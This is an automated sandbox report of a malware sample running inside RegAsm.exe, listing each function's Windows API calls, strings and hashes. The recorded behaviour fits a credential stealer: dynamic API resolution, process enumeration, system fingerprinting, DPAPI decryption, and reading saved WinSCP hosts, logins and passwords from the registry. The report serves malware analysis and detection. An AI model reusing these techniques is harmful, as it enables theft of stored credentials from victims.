Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Strings

/ , xrefs: 00410471

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
Instruction ID: 32467d17135c4381fdee801ccc49f121a9f7beaa17eb491a29c7cc63036ba799
Opcode Fuzzy Hash: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
Instruction Fuzzy Hash: 89319371900119EBCB10DFD5DC85BEEB7B9FB08704F50406EF209A3281DBB85A84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410360 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
HeapAlloc.KERNEL32(00000000), ref: 00410378
GetTimeZoneInformation.KERNEL32(?), ref: 00410387
wsprintfA.USER32 ref: 004103B2

Strings

wwww, xrefs: 00410398

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 362916592-671953474
Opcode ID: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
Instruction ID: 44720081d5bfcf4de0b039264fe6252f71ebe3c074e5847fe516a4db065da787
Opcode Fuzzy Hash: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
Instruction Fuzzy Hash: D4F02774B00214ABD72C6B689C1EFAE7B1E8B82211F444355FE06CB2C0EAB00C1486D5

Uniqueness

Uniqueness Score: -1.00%

Function 00410B00 Relevance: 7.6, APIs: 5, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
Process32Next.KERNEL32(00000000,00000128), ref: 00410B71

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
CloseHandle.KERNEL32(00000000), ref: 00410BE9

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 562399079-0
Opcode ID: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
Instruction ID: 6e6253c0bc7aca0069297d9a5e7774d33834fdaa728087442e1970efbb29e10a
Opcode Fuzzy Hash: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
Instruction Fuzzy Hash: BA21A271A00118EBCB10DFE5DC44BEEB7BCBB49B14F50416EF505A3281DBB85A498B64

Uniqueness

Uniqueness Score: -1.00%

Function 00411C50 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C89
Process32First.KERNEL32(00000000,00000128), ref: 00411C99
Process32Next.KERNEL32(00000000,00000128), ref: 00411CAB
StrCmpCA.SHLWAPI(?,?), ref: 00411CC0
CloseHandle.KERNEL32(00000000), ref: 00411CE2

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
Instruction ID: 08e3f1599d3a10f929bed3b41f19ba99720e1616bff5518888d5ac45308be21b
Opcode Fuzzy Hash: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
Instruction Fuzzy Hash: CD11BF76A01518ABC721CF89DC44BDEFBB9FB86710F204296FA05D3250D7345A40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004117A0 Relevance: 6.1, APIs: 4, Instructions: 63memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
RtlAllocateHeap.NTDLL(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocateBinaryCryptProcessString
String ID:
API String ID: 869800140-0
Opcode ID: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
Instruction ID: 21c28c5b9c274bc113086ca6f345efa6a7341173b31fdfb7d0b317eddc9c08d9
Opcode Fuzzy Hash: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
Instruction Fuzzy Hash: 3F111275200209ABDB10DFA5EC85EEB77EDEF4A351F10455AFD18D7340D7719C518AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00410449 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

/ , xrefs: 00410471

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
String ID: /
API String ID: 3280604673-4001269591
Opcode ID: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
Instruction ID: 18608df84cbcd0239a302a1ab97b581227ab4f7f43221c1533691961591ac6d2
Opcode Fuzzy Hash: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
Instruction Fuzzy Hash: 53116031A00119EACB14DBD4D885BFDB7B9BF18304F1400AEF609B3182DBB85AC4CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00406F90 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
LocalFree.KERNEL32(?), ref: 00406FEE

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
Instruction ID: 09355a3e94bf7739add38d711f9a133fcae8b2d8c69785aff26ce7a8339e2a5e
Opcode Fuzzy Hash: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
Instruction Fuzzy Hash: 3B01E17960020AAFDB14DFA9DC55FAE77B9EF88B00F104559FA05AB380D675ED00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410280 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,01522DE0,?,00401074,01522DE0,?,0041887F), ref: 0041028C
HeapAlloc.KERNEL32(00000000,?,01522DE0,?,00401074,01522DE0,?,0041887F), ref: 00410293
GetUserNameA.ADVAPI32(00000000,01522DE0), ref: 004102A7

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
Instruction ID: 9804d81a03a056e57ee932ac7c1dbb4061c4f1b1a4941ccfe0fe277252d65891
Opcode Fuzzy Hash: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
Instruction Fuzzy Hash: EED012B5541219BBD7109BD49C4DADB7BADDB0A751F501192FB05D3240D5F0590087E1

Uniqueness

Uniqueness Score: -1.00%

Function 004105A0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004105AD
wsprintfA.USER32 ref: 004105C3

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
Instruction ID: 02812af920acb22cdc7078cfa6f9a81c02f6a6398f02c401a58ac9223811f8c5
Opcode Fuzzy Hash: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
Instruction Fuzzy Hash: 81D0C2B980010C97C710DB90EC859E9B3BCAB04200F404295EF04A3180E7756A1DCAE5

Uniqueness

Uniqueness Score: -1.00%

Function 00418CB0 Relevance: 207.2, APIs: 114, Strings: 4, Instructions: 691
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,015228E0), ref: 00418CC5
GetProcAddress.KERNEL32(74DD0000,01522780), ref: 00418CDD
GetProcAddress.KERNEL32(74DD0000,0152DB70), ref: 00418CF6
GetProcAddress.KERNEL32(74DD0000,0152D9D8), ref: 00418D0E
GetProcAddress.KERNEL32(74DD0000,0152D948), ref: 00418D26
GetProcAddress.KERNEL32(74DD0000,0152DAE0), ref: 00418D3F
GetProcAddress.KERNEL32(74DD0000,01524048), ref: 00418D57
GetProcAddress.KERNEL32(74DD0000,0152DA50), ref: 00418D6F
GetProcAddress.KERNEL32(74DD0000,0152D8D0), ref: 00418D88
GetProcAddress.KERNEL32(74DD0000,0152D888), ref: 00418DA0
GetProcAddress.KERNEL32(74DD0000,0152D960), ref: 00418DB8
GetProcAddress.KERNEL32(74DD0000,01522900), ref: 00418DD1
GetProcAddress.KERNEL32(74DD0000,015226C0), ref: 00418DE9
GetProcAddress.KERNEL32(74DD0000,015227A0), ref: 00418E01
GetProcAddress.KERNEL32(74DD0000,01522C20), ref: 00418E1A
GetProcAddress.KERNEL32(74DD0000,0152D9F0), ref: 00418E32
GetProcAddress.KERNEL32(74DD0000,0152DAF8), ref: 00418E4A
GetProcAddress.KERNEL32(74DD0000,01523E90), ref: 00418E63
GetProcAddress.KERNEL32(74DD0000,01522CC0), ref: 00418E7B
GetProcAddress.KERNEL32(74DD0000,0152D978), ref: 00418E93
GetProcAddress.KERNEL32(74DD0000,0152DA80), ref: 00418EAC
GetProcAddress.KERNEL32(74DD0000,0152D8B8), ref: 00418EC4
GetProcAddress.KERNEL32(74DD0000,0152DBB8), ref: 00418EDC
GetProcAddress.KERNEL32(74DD0000,01522D40), ref: 00418EF5
GetProcAddress.KERNEL32(74DD0000,0152DB88), ref: 00418F0D
GetProcAddress.KERNEL32(74DD0000,0152DC48), ref: 00418F25
GetProcAddress.KERNEL32(74DD0000,0152DC00), ref: 00418F3E
GetProcAddress.KERNEL32(74DD0000,0152DC18), ref: 00418F56
GetProcAddress.KERNEL32(74DD0000,0152DBA0), ref: 00418F6E
GetProcAddress.KERNEL32(74DD0000,0152DBE8), ref: 00418F87
GetProcAddress.KERNEL32(74DD0000,0152DBD0), ref: 00418F9F
GetProcAddress.KERNEL32(74DD0000,0152DC30), ref: 00418FB7
GetProcAddress.KERNEL32(74DD0000,015312C8), ref: 00418FD0
GetProcAddress.KERNEL32(74DD0000,0152EDA8), ref: 00418FE8
GetProcAddress.KERNEL32(74DD0000,01531238), ref: 00419000
GetProcAddress.KERNEL32(74DD0000,01531280), ref: 00419019
GetProcAddress.KERNEL32(74DD0000,01522B00), ref: 00419031
GetProcAddress.KERNEL32(74DD0000,01531250), ref: 00419049
GetProcAddress.KERNEL32(74DD0000,01522CE0), ref: 00419062
GetProcAddress.KERNEL32(74DD0000,01531268), ref: 0041907A
GetProcAddress.KERNEL32(74DD0000,01531298), ref: 00419092
GetProcAddress.KERNEL32(74DD0000,01522C00), ref: 004190AB
GetProcAddress.KERNEL32(74DD0000,01522B40), ref: 004190C3
LoadLibraryA.KERNEL32(015311C0,0041807F,?,00000040,00000064,004144A0,00413A10,?,0000002C,00000064,004143F0,00414440,?,00000024,00000064,00414340), ref: 004190D5
LoadLibraryA.KERNEL32(015312B0), ref: 004190E6
LoadLibraryA.KERNEL32(015312E0), ref: 004190F8
LoadLibraryA.KERNEL32(01531070), ref: 0041910A
LoadLibraryA.KERNEL32(01531310), ref: 0041911B
LoadLibraryA.KERNEL32(015312F8), ref: 0041912D
LoadLibraryA.KERNEL32(01531328), ref: 0041913F
LoadLibraryA.KERNEL32(01531220), ref: 00419150
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00419160
GetProcAddress.KERNEL32(75290000,01522B80), ref: 0041917C
GetProcAddress.KERNEL32(75290000,01531100), ref: 00419194
GetProcAddress.KERNEL32(75290000,0152F6E8), ref: 004191AD
GetProcAddress.KERNEL32(75290000,01531340), ref: 004191C5
GetProcAddress.KERNEL32(75290000,01522BC0), ref: 004191DD
GetProcAddress.KERNEL32(734C0000,01523D50), ref: 004191FD
GetProcAddress.KERNEL32(734C0000,01522D20), ref: 00419215
GetProcAddress.KERNEL32(734C0000,01523E68), ref: 0041922E
GetProcAddress.KERNEL32(734C0000,01531058), ref: 00419246
GetProcAddress.KERNEL32(734C0000,01531088), ref: 0041925E
GetProcAddress.KERNEL32(734C0000,01522B20), ref: 00419277
GetProcAddress.KERNEL32(734C0000,01522C60), ref: 0041928F
GetProcAddress.KERNEL32(734C0000,015311F0), ref: 004192A7
GetProcAddress.KERNEL32(752C0000,01522BE0), ref: 004192C3
GetProcAddress.KERNEL32(752C0000,01522C40), ref: 004192DB
GetProcAddress.KERNEL32(752C0000,01531148), ref: 004192F4
GetProcAddress.KERNEL32(752C0000,015310A0), ref: 0041930C
GetProcAddress.KERNEL32(752C0000,01522A80), ref: 00419324
GetProcAddress.KERNEL32(74EC0000,01524138), ref: 00419344
GetProcAddress.KERNEL32(74EC0000,01524098), ref: 0041935C
GetProcAddress.KERNEL32(74EC0000,015310B8), ref: 00419375
GetProcAddress.KERNEL32(74EC0000,01522C80), ref: 0041938D
GetProcAddress.KERNEL32(74EC0000,01522B60), ref: 004193A5
GetProcAddress.KERNEL32(74EC0000,01523EE0), ref: 004193BE
GetProcAddress.KERNEL32(75BD0000,01531190), ref: 004193DE
GetProcAddress.KERNEL32(75BD0000,01522CA0), ref: 004193F6
GetProcAddress.KERNEL32(75BD0000,0152F718), ref: 0041940F
GetProcAddress.KERNEL32(75BD0000,015310D0), ref: 00419427
GetProcAddress.KERNEL32(75BD0000,015310E8), ref: 0041943F
GetProcAddress.KERNEL32(75BD0000,01522BA0), ref: 00419458
GetProcAddress.KERNEL32(75BD0000,01522D00), ref: 00419470
GetProcAddress.KERNEL32(75BD0000,01531118), ref: 00419488
GetProcAddress.KERNEL32(75BD0000,01531130), ref: 004194A1
GetProcAddress.KERNEL32(75A70000,015229A0), ref: 004194BD
GetProcAddress.KERNEL32(75A70000,01531160), ref: 004194D5
GetProcAddress.KERNEL32(75A70000,01531178), ref: 004194EE
GetProcAddress.KERNEL32(75A70000,015311A8), ref: 00419506
GetProcAddress.KERNEL32(75A70000,015311D8), ref: 0041951E
GetProcAddress.KERNEL32(75450000,01522A00), ref: 0041953A
GetProcAddress.KERNEL32(75450000,015229C0), ref: 00419552
GetProcAddress.KERNEL32(75DA0000,01522AC0), ref: 0041956E
GetProcAddress.KERNEL32(75DA0000,01531208), ref: 00419586
GetProcAddress.KERNEL32(6F090000,015229E0), ref: 004195A6
GetProcAddress.KERNEL32(6F090000,01522A20), ref: 004195BE
GetProcAddress.KERNEL32(6F090000,01522AE0), ref: 004195D7
GetProcAddress.KERNEL32(6F090000,01531370), ref: 004195EF
GetProcAddress.KERNEL32(6F090000,01522A40), ref: 00419607
GetProcAddress.KERNEL32(6F090000,01522A60), ref: 00419620
GetProcAddress.KERNEL32(6F090000,01522AA0), ref: 00419638
GetProcAddress.KERNEL32(6F090000,015319A0), ref: 00419650
GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419667
GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 0041967E
GetProcAddress.KERNEL32(75AF0000,01531388), ref: 0041969A
GetProcAddress.KERNEL32(75AF0000,0152F748), ref: 004196B2
GetProcAddress.KERNEL32(75AF0000,015313D0), ref: 004196CB
GetProcAddress.KERNEL32(75AF0000,01531358), ref: 004196E3
GetProcAddress.KERNEL32(75D90000,01531BA0), ref: 004196FF
GetProcAddress.KERNEL32(6CD40000,015313E8), ref: 0041971B
GetProcAddress.KERNEL32(6CD40000,01531960), ref: 00419733
GetProcAddress.KERNEL32(6CD40000,01531400), ref: 0041974C
GetProcAddress.KERNEL32(6CD40000,01531418), ref: 00419764
GetProcAddress.KERNEL32(6CB50000,SymMatchString), ref: 0041977E

Strings

dbghelp.dll, xrefs: 00419156
HttpQueryInfoA, xrefs: 0041965C
SymMatchString, xrefs: 00419778
InternetSetOptionA, xrefs: 00419673

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
API String ID: 2238633743-951535364
Opcode ID: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
Instruction ID: c5f05c92df86ae6c309de6d93bbb22230759f21ed052dce6c69101577189e498
Opcode Fuzzy Hash: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
Instruction Fuzzy Hash: F06210BD6002029FD744DFA5ECA896637FBF78BB413A06519FA05C7364E734A885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040C550 Relevance: 87.9, APIs: 36, Strings: 14, Instructions: 371
stringregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040C58B
memset.MSVCRT ref: 0040C5AA
memset.MSVCRT ref: 0040C5C2
memset.MSVCRT ref: 0040C5DA
memset.MSVCRT ref: 0040C5ED
memset.MSVCRT ref: 0040C5FB
memset.MSVCRT ref: 0040C60C
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,000000FF), ref: 0040C62E
RegGetValueA.ADVAPI32(000000FF,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C69E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,000000FF), ref: 0040C6D6
RegEnumKeyExA.ADVAPI32(000000FF,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C718
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C72C
HeapAlloc.KERNEL32(00000000), ref: 0040C733
lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
lstrcat.KERNEL32(00421610,?), ref: 0040C78C
RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
lstrcat.KERNEL32(00421610,?), ref: 0040C848
lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
